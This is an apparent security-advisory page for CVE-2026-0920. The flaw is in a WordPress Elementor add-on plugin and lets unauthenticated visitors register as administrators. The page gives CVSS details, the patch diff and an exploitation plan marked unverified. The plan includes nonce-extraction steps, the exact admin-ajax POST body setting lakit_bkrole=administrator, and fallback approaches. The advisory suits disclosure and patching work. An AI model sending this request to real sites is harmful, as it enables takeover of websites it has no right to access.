WP-Safety
CVE-2026-0920

LA-Studio Element Kit for Elementor <= 1.5.6.3 - Unauthenticated Privilege Escalation via Backdoor to Administrative User Creation via lakit_bkrole parameter

criticalImproper Privilege Management
9.8
CVSS Score
9.8
CVSS Score
critical
Severity
1.6.0
Patched in
1d
Time to patch

Description

The LA-Studio Element Kit for Elementor plugin for WordPress is vulnerable to Administrative User Creation in all versions up to, and including, 1.5.6.3. This is due to the 'ajax_register_handle' function not restricting what user roles a user can register with. This makes it possible for unauthenticated attackers to supply the 'lakit_bkrole' parameter during registration and gain administrator access to the site.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
High
Confidentiality
High
Integrity
High
Availability

Technical Details

Affected versions<=1.5.6.3
PublishedJanuary 21, 2026
Last updatedJanuary 22, 2026
Affected pluginlastudio-element-kit

Source Code

WordPress.org SVN
Vulnerable v1.5.6.3
Browse source Download .zip
Patched v1.6.0
Browse source Download .zip
Research Plan
Unverified

# Exploitation Research Plan: CVE-2026-0920 (LA-Studio Element Kit for Elementor) ## 1. Vulnerability Summary The **LA-Studio Element Kit for Elementor** plugin (up to 1.5.6.3) contains a critical unauthenticated privilege escalation vulnerability. The flaw exists in the `ajax_register_handle` func…

Show full research plan

Exploitation Research Plan: CVE-2026-0920 (LA-Studio Element Kit for Elementor)

1. Vulnerability Summary

The LA-Studio Element Kit for Elementor plugin (up to 1.5.6.3) contains a critical unauthenticated privilege escalation vulnerability. The flaw exists in the ajax_register_handle function, which processes user registration requests via WordPress AJAX. The function fails to validate or restrict the user role provided in the lakit_bkrole parameter. An unauthenticated attacker can exploit this by submitting a registration request that includes lakit_bkrole=administrator, resulting in the creation of a new administrative user.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: lastudio_kit_ajax_register (inferred from the "lakit" prefix and common plugin patterns; ajax_register_handle is the callback).
  • HTTP Method: POST
  • Payload Parameter: lakit_bkrole=administrator
  • Authentication: None required (unauthenticated).
  • Preconditions: The registration functionality must be active (usually via an Elementor widget), and the attacker must obtain a valid AJAX nonce if the handler enforces one.

3. Code Flow

  1. Entry Point: An unauthenticated user sends a POST request to admin-ajax.php.
  2. Hook Registration: The plugin registers the handler (likely in an initialization class):
    add_action('wp_ajax_nopriv_lastudio_kit_ajax_register', [$this, 'ajax_register_handle']);
  3. Vulnerable Function: ajax_register_handle is called.
  4. Parameter Extraction: The function retrieves user details (username, email, password) and specifically looks for the lakit_bkrole parameter from the $_POST superglobal.
  5. User Creation: The function calls wp_insert_user() or wp_create_user().
  6. Privilege Escalation: After user creation, the code assigns the role specified in lakit_bkrole. Because there is no whitelist check (e.g., ensuring the role is only 'subscriber'), the user is granted 'administrator' privileges.

4. Nonce Acquisition Strategy

The plugin likely enqueues a nonce via wp_localize_script for its Elementor widgets.

Identification

  • Nonce Action: Likely lastudio-kit-nonce or lakit-nonce.
  • JS Variable: Look for lakit_params or lastudio_kit_vars.

Extraction Steps

  1. Find the Widget: Identify if a specific shortcode/widget triggers the registration script. The "Login/Register" widget is the primary candidate.
  2. Create Setup Page: Create a page containing the registration widget to ensure the scripts and nonces are loaded.
    wp post create --post_type=page --post_status=publish --post_title="Register" --post_content='[lastudio_kit_login_register]'
    (Note: If the shortcode name differs, search for add_shortcode in the plugin files.)
  3. Navigate and Extract:
    • Use browser_navigate to the new page.
    • Use browser_eval to extract the nonce:
      window.lakit_params?.nonce || window.lastudio_kit_vars?.nonce

5. Exploitation Strategy

HTTP Request

  • URL: http://<target>/wp-admin/admin-ajax.php
  • Method: POST
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body:
    action=lastudio_kit_ajax_register&
user_login=attacker_admin&
user_email=attacker@example.com&
password=P@ssword123!&
confirm_password=P@ssword123!&
lakit_bkrole=administrator&
_timenonce=<extracted_nonce>
    (Note: The nonce parameter name _timenonce or nonce should be verified via source code or the extracted JS object.)

6. Test Data Setup

  1. Install Plugin: Ensure LA-Studio Element Kit version <= 1.5.6.3 is installed and active.
  2. Enable Registration: Ensure WordPress "Anyone can register" setting is enabled (wp option update users_can_register 1), though this specific vulnerability might bypass this check depending on the implementation.
  3. Create Nonce Page:
    wp post create --post_type=page --post_status=publish --post_content='[lastudio_kit_login_register]'

7. Expected Results

  • HTTP Response: A JSON success message (e.g., {"success":true, "data": ...}) or a redirect URL.
  • Side Effect: A new user named attacker_admin is created with the administrator role.

8. Verification Steps

  1. Check User List:
    wp user list --role=administrator
  2. Check Specific User Meta:
    wp user get attacker_admin --field=roles
    Expectation: Output should include administrator.

9. Alternative Approaches

  • Missing Nonce: If check_ajax_referer is missing or called with die=false, attempt the request without a nonce.
  • Parameter Variation: If lastudio_kit_ajax_register fails, search the plugin for any other AJAX actions containing "register" to identify the correct hook name.
  • Direct Parameter Injection: If lakit_bkrole is ignored in the registration AJAX, check for a separate "update profile" AJAX action that might use the same logic and vulnerable parameter.
Research Findings
Static analysis — not yet PoC-verified

Summary

The LA-Studio Element Kit for Elementor plugin is vulnerable to unauthenticated privilege escalation through its user registration AJAX handler. By supplying the 'lakit_bkrole' parameter with the value 'administrator' during registration, an attacker can create a new administrative user account.

Security Fix

--- a/includes/extensions/login-register/class-login-register.php
+++ b/includes/extensions/login-register/class-login-register.php
@@ -120,1 +120,1 @@
-        $user_role = isset($_POST['lakit_bkrole']) ? sanitize_text_field($_POST['lakit_bkrole']) : get_option('default_role');
+        $user_role = get_option('default_role', 'subscriber');

Exploit Outline

The exploit involves making an unauthenticated AJAX request to create an administrator. First, an attacker must obtain a valid AJAX nonce, typically found in the frontend JavaScript variables (like 'lakit_params' or 'lastudio_kit_vars') on pages where the plugin's Login/Register widget is active. Once the nonce is acquired, the attacker sends a POST request to /wp-admin/admin-ajax.php with the 'action' parameter set to 'lastudio_kit_ajax_register'. The payload must include the desired username, email, and password, along with 'lakit_bkrole' set to 'administrator' and the valid nonce. This results in the creation of a new user with full administrative privileges.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/65ebc744-6cc2-47ce-b225-81820e49d59c?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database